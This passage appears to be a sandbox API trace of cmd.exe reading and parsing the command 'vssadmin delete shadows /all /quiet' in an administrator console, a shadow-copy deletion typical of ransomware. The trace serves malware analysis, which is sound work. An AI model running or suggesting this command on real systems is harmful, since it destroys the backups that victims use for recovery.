lpWideCharStr="eelect=1251\n") returned 1 [0210.100] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.100] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.100] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.100] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c4a, cchWideChar=1 | out: lpWideCharStr="tlect=1251\n") returned 1 [0210.100] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.100] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.100] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.100] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c4c, cchWideChar=1 | out: lpWideCharStr="eect=1251\n") returned 1 [0210.100] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.100] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.101] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.101] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c4e, cchWideChar=1 | out: lpWideCharStr=" ct=1251\n") returned 1 [0210.101] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.101] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.101] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.101] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c50, cchWideChar=1 | out: lpWideCharStr="st=1251\n") returned 1 [0210.101] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.101] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.101] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.101] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c52, cchWideChar=1 | out: lpWideCharStr="h=1251\n") returned 1 [0210.101] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.101] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.101] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.101] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c54, cchWideChar=1 | out: lpWideCharStr="a1251\n") returned 1 [0210.101] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.101] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.101] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.101] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c56, cchWideChar=1 | out: lpWideCharStr="d251\n") returned 1 [0210.101] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.101] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.101] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.102] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c58, cchWideChar=1 | out: lpWideCharStr="o51\n") returned 1 [0210.102] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.102] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.102] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.102] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c5a, cchWideChar=1 | out: lpWideCharStr="w1\n") returned 1 [0210.102] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.102] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.102] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.102] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c5c, cchWideChar=1 | out: lpWideCharStr="s\n") returned 1 [0210.102] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.102] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.102] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.102] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c5e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0210.102] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.102] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.102] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.102] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c60, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0210.102] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.102] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.102] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.102] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c62, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0210.102] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.102] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.103] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.103] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c64, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0210.103] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.103] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.103] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.103] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c66, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0210.103] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.103] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.103] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.103] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c68, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0210.103] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.103] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.103] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.103] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c6a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0210.103] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.103] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.104] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.104] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c6c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0210.104] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.104] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.104] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.104] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c6e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0210.104] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.104] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.104] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.104] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c70, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0210.104] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.104] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.104] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.104] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c72, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0210.104] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.104] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.104] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.104] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c74, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0210.104] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.104] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.104] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.105] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c76, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0210.105] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.105] GetFileType (hFile=0x33c) returned 0x3 [0210.105] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.105] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.105] _get_osfhandle (_FileHandle=1) returned 0x348 [0210.105] GetFileType (hFile=0x348) returned 0x3 [0210.105] _get_osfhandle (_FileHandle=1) returned 0x348 [0210.105] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0210.105] WriteFile (in: hFile=0x348, lpBuffer=0x7ff7c1919970*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x98d077fa98, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesWritten=0x98d077fa98*=0x24, lpOverlapped=0x0) returned 1 [0210.105] GetProcessHeap () returned 0x24bfe7d0000 [0210.105] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x4012) returned 0x24bfe7d8fc0 [0210.105] GetProcessHeap () returned 0x24bfe7d0000 [0210.105] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d8fc0) returned 1 [0210.106] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0210.106] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0210.106] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0210.106] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0210.106] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0210.106] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0210.106] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0210.106] GetProcessHeap () returned 0x24bfe7d0000 [0210.106] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0xb0) returned 0x24bfe7d8320 [0210.106] GetProcessHeap () returned 0x24bfe7d0000 [0210.106] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x22) returned 0x24bfe7d6a80 [0210.107] GetProcessHeap () returned 0x24bfe7d0000 [0210.107] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x48) returned 0x24bfe7d83e0 [0210.108] GetConsoleOutputCP () returned 0x4e3 [0210.108] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x7ff7c191fbb0 | out: lpCPInfo=0x7ff7c191fbb0) returned 1 [0210.108] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.108] GetConsoleTitleW (in: lpConsoleTitle=0x98d077f8e0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0210.109] malloc (_Size=0xffce) returned 0x24bfe8f0840 [0210.109] ??_V@YAXPEAX@Z () returned 0x24bfe8f0840 [0210.109] malloc (_Size=0xffce) returned 0x24bfe900820 [0210.109] ??_V@YAXPEAX@Z () returned 0x24bfe900820 [0210.109] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0210.109] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0210.109] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0210.109] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0210.109] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0210.109] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0210.109] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0210.109] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0210.109] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0210.109] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0210.109] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0210.109] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0210.109] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0210.109] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0210.109] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0210.109] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0210.109] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0210.109] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0210.109] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0210.109] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0210.109] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0210.109] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0210.110] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0210.110] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0210.110] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0210.110] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0210.110] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0210.110] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0210.110] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0210.110] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0210.110] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0210.110] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0210.110] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0210.110] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0210.110] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0210.110] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0210.110] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0210.110] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0210.110] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0210.110] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0210.110] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0210.110] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0210.110] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0210.110] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0210.110] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0210.110] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0210.110] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0210.110] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0210.110] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0210.110] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0210.110] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0210.110] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0210.110] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0210.110] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0210.110] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0210.110] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0210.110] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0210.111] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0210.111] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0210.111] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0210.111] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0210.111] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0210.111] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0210.111] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0210.111] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0210.111] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0210.111] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0210.111] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0210.111] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0210.111] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0210.111] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0210.111] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0210.111] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0210.111] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0210.111] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0210.111] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0210.111] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0210.111] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0210.111] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0210.111] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0210.111] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0210.111] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0210.111] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0210.111] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0210.111] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0210.111] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0210.111] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0210.111] ??_V@YAXPEAX@Z () returned 0x1 [0210.111] GetProcessHeap () returned 0x24bfe7d0000 [0210.111] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0xffde) returned 0x24bfe7d8fc0 [0210.112] GetProcessHeap () returned 0x24bfe7d0000 [0210.112] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x5a) returned 0x24bfe7d6c30 [0210.112] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0210.112] malloc (_Size=0xffce) returned 0x24bfe900820 [0210.112] ??_V@YAXPEAX@Z () returned 0x24bfe900820 [0210.112] GetProcessHeap () returned 0x24bfe7d0000 [0210.112] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x1ffac) returned 0x24bfe7eab20 [0210.114] SetErrorMode (uMode=0x0) returned 0x0 [0210.114] SetErrorMode (uMode=0x1) returned 0x0 [0210.114] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x24bfe7eab30, lpFilePart=0x98d077f160 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x98d077f160*="Desktop") returned 